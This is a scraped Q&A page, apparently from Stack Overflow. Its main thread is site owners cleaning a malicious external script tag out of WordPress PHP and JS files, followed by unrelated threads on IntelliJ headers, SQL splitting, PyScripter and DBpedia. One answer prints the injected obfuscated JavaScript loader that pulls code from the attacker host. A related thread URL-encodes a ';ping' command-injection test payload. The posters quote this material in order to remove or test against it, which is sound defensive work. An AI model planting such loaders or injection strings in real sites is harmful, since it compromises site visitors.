Remove malware line of text from multiple files in Linux [closed] - malware

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 3 years ago.
Improve this question
Recently I have noticed that all my WP sites have injected malware in all the index.php files. I have identified the problem and patch it, however I can not delete the malware linces from the files. I tried this command:
find . -name "*.php" -exec sed -i 's/<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>><//' {} \;
but I get error:
find: missing argument to `-exec'
so I guess I have syntax error. Can you please tell me the exact command to delete in all files this line:
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>

This is the line I used, I had thee same problem this morning.
grep -rl "<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g"

Check if the plugin "super-socialat" exists and delete it, this is malware too. We found this plugin on all sites with this **** malware.
And please check if adminer.php is uploaded to your server. It seems to be their using adminer to hack the sites:
https://sansec.io/labs/2019/01/17/adminer-4.6.2-file-disclosure-vulnerability/
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

I encountered the same problem.
The script is not in file, it's in database.
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
Use better search and replace plugin to replace it with blank.

The JS files are also affected.
I ran find -type f -mtime -1
and found this code prepended to all my .js files.
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script');
s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

wordpress's temp-crawl.php causes the issue.
i have wp and native php sites in the server. suspicious filer re index.* they have this script line mentioned above
also every .js files re infected as well.
and there s a file in the root directory wp-craft-report-conf.php must be deleted.
then it seems everything is working well. at least for now

i have a same problem
i add 127.0.0.1 trasnaltemyrecords.com into /etc/hosts
grep -r * 'scripts.trasnaltemyrecords.com' > file_with_scripts.txt
With this script, i remove this injection
$txt_file = file_get_contents('file_with_scripts.txt');
$rows = explode("\n", $txt_file);
array_shift($rows);
foreach($rows as $row => $data)
{
$filename = $data ;
$file = fopen($filename, 'rw');
$contents = fread($file, filesize($filename));
$new_content = preg_replace('/^<script(.*)script>/i', '', $contents);
echo $new_content;
fclose($file);
}
Check your database if you use ACF
Check too this topic in Wordpress.org
https://wordpress.org/support/topic/malware-found-injected-script/

Related

Converting linux commands to URI/CGI encoded. A better way?

I am testing some PHP apps for injectable commands. I have to convert my commands to a URI/CGI encoded format. I am wondering if there is a better way to do it.
When I want to include a ping (to test if the app is, in fact, executing from an injection) I am converting it as follows.
hURL -X --esc ";ping localhost -c 1" | sed -e ‘s/\\x/\%/g’
Here is the output.
%3b%20%70%69%6e%67%20%6c%6f%63%61%6c%68%6f%73%74%20%2d%63%20%31
Works perfect. The code is injected and logs are showing it being handled as expected.
QUESTION: Is there a better way to convert to the above. I think I am over complicating things.
You could possibly use an out-of-the-box library for doing the escaping, may be a little easier on the eye ...
$ echo ';ping localhost -c 1' | perl -ne 'use URI::Escape; print(uri_escape($_) . "\n");'
%3Bping%20localhost%20-c%201%0A
Obviously this output does not escape legitimate url chars so not sure this entirely answers your question ...

IntelliJ: Dynamically updated file header

By default, IntelliJ Idea will insert (something like) the following as the header of a new source file:
/**
* Created by JohnDoe on 2016-04-27.
*/
The corresponding template is:
/**
* Created by ${USER} on ${DATE}.
*/
Is it possible to update this template so that it inserts the last date of modification when the file is changed? For example:
/**
* Created by JohnDoe on 2016-03-27.
* Last modified by JaneDoe on 2016-04-27
*/
It is not supported out of the box. I suggest you do not include information about author and last edit/create time in file at all.
The reason is that your version control system (Git, SVN) contains the same information automatically. So the manual labelling is just duplicate of already existing info, but is only more error prone and needs to be manually updated.
Here's a working solution similar to what I'm using. Tested on mac os.
Create a bash script which will replace first occurrence of Last modified by JaneDoe on $DATE only if the exact value is not contained in the file:
#!/bin/bash
FILE=src/java/test/Test.java
DATE=`date '+%Y-%m-%d'`
PREFIX="Last modified by JaneDoe on "
STRING="$PREFIX.*$"
SUBSTITUTE="$PREFIX$DATE"
if ! grep -q "$SUBSTITUTE" "$FILE"; then
sed -i '' "1,/$(echo "$STRING")/ s/$(echo "$STRING")/$(echo "$SUBSTITUTE")/" $FILE
fi
Install File Watchers plugin.
Create a file watcher with appropriate scope (it may be this single file or any other scope, so that any change in project's source code will update modified date or version etc.) and put a path to your bash script into Program field.
Now every time the file changes the date will update. If you want to update date for each file separately, an argument $FilePath$ should be passed to the script.
This might have been just a comment to #oleg-mikhailov excellent idea, but the code snippet won't fit. Basically, I just tweaked his solution.
I needed a slightly different syntax but that's not the issue. The issue was that when the script ran automatically upon file save using the File Watchers plugin, if ran on a file which doesn't include PREFIX it would run over and over for ever.
I presume the that the issue is with the plugin itself, as it didn't happen when run from the shell, but I'm not sure why it happened.
Anyway, I ended up running the following script (as I said only a slight change with respect to the original). The new script also raises an error if the the prefix doesn't exist. For me this is a feature as Pycharm prompts me with the error, and I can fix the file.
Tested with PyCharm 2021.2.3 on macOS 11.6.
#!/bin/bash
FILE=$1
DATE=`date '+%Y-%m-%d'`
PREFIX="last_modified_date: "
STRING="$PREFIX.*$"
SUBSTITUTE="$PREFIX$DATE"
if ! grep -q "$SUBSTITUTE" "$FILE"; then
if grep -q "$PREFIX" "$FILE"; then
sed -i '' "s/$(echo "$STRING")/$(echo "$SUBSTITUTE")/" $FILE
else
echo "Error!"
echo "'$PREFIX' doesn't appear in $FILE"
exit 1
fi
fi
PHPStorm has not a "hook" for launching task after detect a change in file (just for uploading in server yes). Code templating is based on the creation of file not change.
The behaviour you want (automatic change file after manual change file) can be useful for lot of things but it's circular headhache for editor. Because if you change a file it must change file (and if a file is change ? it change file ?).
However, You can, perhaps, "enable Live Templates" when you launch a "reformat code" which able to rewrite your begin template code that way rewrite date modification.
Other solution is that use a tools with as grunt but I don't know if manage php file.

How to split sql in MAC OSX?

Is there any app for mac to split sql files or even script?
I have a large files which i have to upload it to hosting that doesn't support files over 8 MB.
*I don't have SSH access
You can use this : http://www.ozerov.de/bigdump/
Or
Use this command to split the sql file
split -l 5000 ./path/to/mysqldump.sql ./mysqldump/dbpart-
The split command takes a file and breaks it into multiple files. The -l 5000 part tells it to split the file every five thousand lines. The next bit is the path to your file, and the next part is the path you want to save the output to. Files will be saved as whatever filename you specify (e.g. “dbpart-”) with an alphabetical letter combination appended.
Now you should be able to import your files one at a time through phpMyAdmin without issue.
More info http://www.webmaster-source.com/2011/09/26/how-to-import-a-very-large-sql-dump-with-phpmyadmin/
This tool should do the trick: MySQLDumpSplitter
It's free and open source.
Unlike the accepted answer to this question, this app will always keep extended inserts intact so the precise form of your query doesn't matter; the resulting files will always have valid SQL syntax.
Full disclosure: I am a share holder of the company that hosts this program.
The UploadDir feature in phpMyAdmin could help you, if you have FTP access and can modify your phpMyAdmin's configuration (or are allowed to install your own instance of phpMyAdmin).
http://docs.phpmyadmin.net/en/latest/config.html?highlight=uploaddir#cfg_UploadDir
You can split into working SQL statements with:
csplit -s -f db-part db.sql "/^# Dump of table/" "{99}"
Which makes up to 99 files named 'db-part[n]' from db.sql
You can use "CREATE TABLE" or "INSERT INTO" instead of "# Dump of ..."
Also: Avoid installing any programs or uploading your data into any online service. You don't know what will be done with your information!

How do I get the .write function to work with PyScripter?

To reproduce problem:
In the PyScripter editor, write:
outf = open('output.txt', 'w')
outf.write('hello, world!')
Result:
For me at least, here is what happens, when output.txt does not already exist.
output.txt is created
output.txt will contain no data or text at all when opened by any text editor.
So my question is, how do I make this work?
Other information:
I am using PyScripter 2.5.3.0 x64, with Python 2.7.3, 64 bit as the interpreter.
Printing to the console works fine, all other functions and code work fine.
When I use python in Command Prompt, I can write to output files fine. My problem is only in PyScripter.
Thanks,
DS
The question was already resolved in comments, but I will post a complete answer regardless.
Writes to files may be delayed. To make sure they aren't, force a flush by closing the file:
outf.close()
If you don't want to explicitly call close, try using with ... as:
with open('output.txt', 'w') as outf:
outf.write('hello, world!')

How to import dbpedia into neo4j? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 3 years ago.
Improve this question
I need to import dbpedia into neo4j.
I download the dbpedia from here: http://wiki.dbpedia.org/Downloads37
Any idea?
I am currently doing the same thing. I found that the biggest problem for this is the indexing so the best solution is to write a java program that extracts the statements with md5 hashes into a triple file like follows:
subjectHash \t predicateHash \t objectHash \t subject \t predicate \t object \n.
In another file you will need to store the nodes (aka subjects and objects of statements):
nodeHash \t nodeValue
The code for this procedure can be downloaded from my github:
https://github.com/eschleining/DbPediaImport.git
Compile it with mvn package and it creates a jar file in target that takes the gzipped dbpedia files as arguments. If you only have the bz2 files you can transform them like follows:
for i in *.bz2 ; do bzcat "$i" | gzip > "${i%.bz2}.gz"; done &
Now run:
java -jar ConcurrentDataTableWriter-0.0.1-SNAPSHOT.jar yourdbpediaFolder/*.gz
Then you sort the newly created files manually with the sort utility of linux:
gunzip -c nodes.gz | sort -k2 -u | gzip > nodes_unique.gz
And the triples file:
gunzip -c triples.gz | sort -k1,3,2 -u | gzip > triples_unique.gz
Now you can compile the batch inserter of my repo with maven3 (mvn package) and run it in the same directory as the nodes_unique.gz and triples_unique.gz files it creates a Neo4J database directory named "DbpediaNe04J" (mind the typo "0 instead of o).
I found this to be the fastest way since it only looks up an index once for each subject/object pair in a triple.
Feel free to add datatype nodes as properties and so on. I currently have implemented each triple as a relationship between two nodes.